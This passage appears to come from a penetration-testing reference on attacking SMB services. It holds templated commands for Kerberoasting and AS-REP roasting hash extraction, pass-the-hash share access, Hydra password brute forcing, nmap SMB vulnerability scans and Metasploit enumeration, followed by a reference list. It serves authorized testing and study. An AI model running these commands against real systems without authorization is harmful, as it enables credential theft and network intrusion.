GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" 732 getArch.py -target {IP} 733 734 With Creds 735 smbmap -H {IP} -u {Username} -p {Password} 736 smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} 737 smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` 738 crackmapexec smb {IP} -u {Username} -p {Password} --shares 739 GetADUsers.py {Domain_Name}/{Username}:{Password} -all 740 GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat 741 GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request 742 743 https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html 744 745 Entry_2: 746 Name: Enum4Linux 747 Description: General SMB Scan 748 Command: enum4linux -a {IP} 749 750 Entry_3: 751 Name: Nmap SMB Scan 1 752 Description: SMB Vuln Scan With Nmap 753 Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP} 754 755 Entry_4: 756 Name: Nmap Smb Scan 2 757 Description: SMB Vuln Scan With Nmap (Less Specific) 758 Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP} 759 760 Entry_5: 761 Name: Hydra Brute Force 762 Description: Need User 763 Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb 764 765 Entry_6: 766 Name: SMB/SMB2 139/445 consolesless mfs enumeration 767 Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole 768 Note: sourced from https://github.com/carlospolop/legion 769 Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' 770 771 ``` 772 773 ## References 774 775 - [1] [0xdf - HTB Abducted](https://0xdf.gitlab.io/2026/07/07/htb-abducted.html) 776 - [2] [Samba `smb.conf` man page](https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html) 777 - [3] [NVD - CVE-2026-4480](https://nvd.nist.gov/vuln/detail/CVE-2026-4480) 778 - [4] [Rclone `obscure` documentation](https://rclone.org/commands/rclone_obscure/) 779 - [5] [NetExec (CME) wiki – Kerberos usage](https://www.netexec.wiki/) 780 - [6] [ShareHound (collector)](https://github.com/p0dalirius/sharehound) 781 - [7] [ShareQL (DSL)](https://github.com/p0dalirius/shareql) 782 - [8] [Pentesting Kerberos (88) – client setup and troubleshooting](/hacktricks/network-services-pentesting/pentesting-kerberos-88/overview) 783 - [9] [Microsoft SMB2 transport specification](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1dfacde4-b5c7-4494-8a14-a09d3ab4cc83) 784 - [10] [SMB file sharing overview for Windows and Windows Server](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) 785 - [11] [Microsoft overview of SMB signing and relay protection](https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-signing-overview)